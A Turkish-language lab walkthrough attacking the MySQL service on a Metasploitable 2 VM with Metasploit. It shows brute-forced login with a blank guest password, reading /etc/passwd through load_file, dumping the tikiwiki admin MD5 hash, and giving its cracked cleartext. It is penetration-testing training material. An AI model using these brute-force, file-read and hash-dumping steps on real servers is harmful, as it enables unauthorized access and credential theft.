Metasploitable 2 Exploit Mysql

Exploit #6 : MySQL

Mysql çok kullanılan bir veritabanı yönetim sistemidir. Servisin çalıştığı nmap çıktısından görülebilir.

3306/tcp open  mysql             MySQL 5.0.51a-3ubuntu5

 

İlk olarak mysql için brute force ile kullanıcı adı ve parola bilgisi elde edimeye çalışılır.

 

msf> search mysql login

Matching Modules

================

  Name                                        Disclosure Date       Rank    Description

  —-                                        —————       —-    ———–

  auxiliary/scanner/mysql/mysql_login                                  normal MySQL Login Utility

  exploit/windows/mysql/scrutinizer_upload_exec  2012-07-27 00:00:00 UTC  excellent  Plixer Scrutinizer NetFlow and sFlow Analyzer 9 Default MySQL Credential

 

msf> use auxiliary/scanner/mysql/mysql_login

msf auxiliary(mysql_login) > show options

 

Module options (auxiliary/scanner/mysql/mysql_login):

 

  Name           Current Setting  Required  Description

  —-           —————  ——–  ———–

  BLANK_PASSWORDS   true          no     Try blank passwords for all users

  BRUTEFORCE_SPEED  5             yes    How fast to bruteforce, from 0 to 5

  PASSWORD                        no     A specific password to authenticate with

  PASS_FILE                       no     File containing passwords, one per line

  RHOSTS         172.16.52.133 yes    The target address range or CIDR identifier

  RPORT          3306          yes    The target port

  STOP_ON_SUCCESS   false         yes    Stop guessing when a credential works for a host

  THREADS        1             yes    The number of concurrent threads

  USERNAME                        no     A specific username to authenticate as

  USERPASS_FILE                   no     File containing users and passwords separated by space, one pair per line

  USER_AS_PASS   true          no     Try the username as the password for all users

  USER_FILE                       no     File containing usernames, one per line

  VERBOSE        true          yes    Whether to print output for all attempts

 

 

msf auxiliary(mysql_login) > set USERPASS_FILE /opt/metasploit/apps/pro/msf3/data/wordlists/namelist.txt

USERPASS_FILE => /opt/metasploit/apps/pro/msf3/data/wordlists/namelist.txt

msf auxiliary(mysql_login) > set PASS_FILE /opt/metasploit/apps/pro/msf3/data/wordlists/http_default_pass.txt

PASS_FILE => /opt/metasploit/apps/pro/msf3/data/wordlists/http_default_pass.txt

msf auxiliary(mysql_login) > exploit

 

[*] 172.16.52.133:3306 MYSQL – [0721/3832] – Trying username:’guest’ with password:”

[+] 172.16.52.133:3306 – SUCCESSFUL LOGIN ‘guest’ : ”

[*] Scanned 1 of 1 hosts (100% complete)

[*] Auxiliary module execution completed

 

Görüldüğü üzere kullanıcı adı:guest ve boş parolayla login olunabilmekte. Bu kullanıcı adı ve boş parolayla mysql üzerinden sistemden /etc/passwd dosyası alınmıştır.

 

msf>  use auxiliary/admin/mysql/mysql_sql

msf auxiliary(mysql_sql) > show options

 

Module options (auxiliary/admin/mysql/mysql_sql):

  Name   Current Setting   Required  Description

  —-   —————   ——–  ———–

  PASSWORD                 no     The password for the specified username

  RHOST                    yes    The target address

  RPORT 3306           yes    The target port

  SQL    select version()  yes    The SQL to execute.

  USERNAME                 no     The username to authenticate as

msf auxiliary(mysql_sql) > set RHOST 172.16.52.133

RHOST => 172.16.52.133

msf auxiliary(mysql_sql) > set USERNAME guest

USERNAME => guest

msf auxiliary(mysql_sql) > exploit

 

[*] Sending statement: ‘select version()’…

[*]  | 5.0.51a-3ubuntu5 |

[*] Auxiliary module execution completed

 

msf auxiliary(mysql_sql) > set SQL select load_file(\’/etc/passwd\’)

SQL => select load_file(‘/etc/passwd’)

msf auxiliary(mysql_sql) > exploit

 

[*] Sending statement: ‘select load_file(‘/etc/passwd’)’…

[*]  | root:x:0:0:root:/root:/bin/bash

daemon:x:1:1:daemon:/usr/sbin:/bin/sh

bin:x:2:2:bin:/bin:/bin/sh

sys:x:3:3:sys:/dev:/bin/sh

sync:x:4:65534:sync:/bin:/bin/sync

games:x:5:60:games:/usr/games:/bin/sh

man:x:6:12:man:/var/cache/man:/bin/sh

lp:x:7:7:lp:/var/spool/lpd:/bin/sh

 

Metasploit haricinde komut satırındanda mysqle giriş yapılıp veritabanı görüntülenebilir. Yönetici adı ve parola hashi alınabilir.

 

# mysql -h 172.16.52.133 -u guest -p

Enter password:

Welcome to the MySQL monitor.  Commands end with ; or \g.

Your MySQL connection id is 9602

Server version: 5.0.51a-3ubuntu5 (Ubuntu)

Copyright (c) 2000, 2013, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its

affiliates. Other names may be trademarks of their respective

owners.

 

Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the current input statement.

 

mysql> show databases;

+——————–+

| Database        |

+——————–+

| information_schema |

| dvwa            |

| metasploit      |

| mysql           |

| owasp10         |

| tikiwiki        |

| tikiwiki195     |

+——————–+

7 rows in set (0.00 sec)

 

mysql> use tikiwiki;

Reading table information for completion of table and column names

You can turn off this feature to get a quicker startup with -A

 

Database changed

mysql> select login,hash from users_users;

+——-+———————————-+

| login | hash                          |

+——-+———————————-+

| admin | f6fdffe48c908deb0f4c3bd36c032e72 |

+——-+———————————-+

1 row in set (0.02 sec)

mysql>

Parola john the ripper ile kolayca kırılabilir. Admin şifresi md5 ile özeti alınmış ve cleartext olarak :  “adminadmin”

Sistemde tikiwiki olduğunu gördük bunun üzerinden gidilebilir.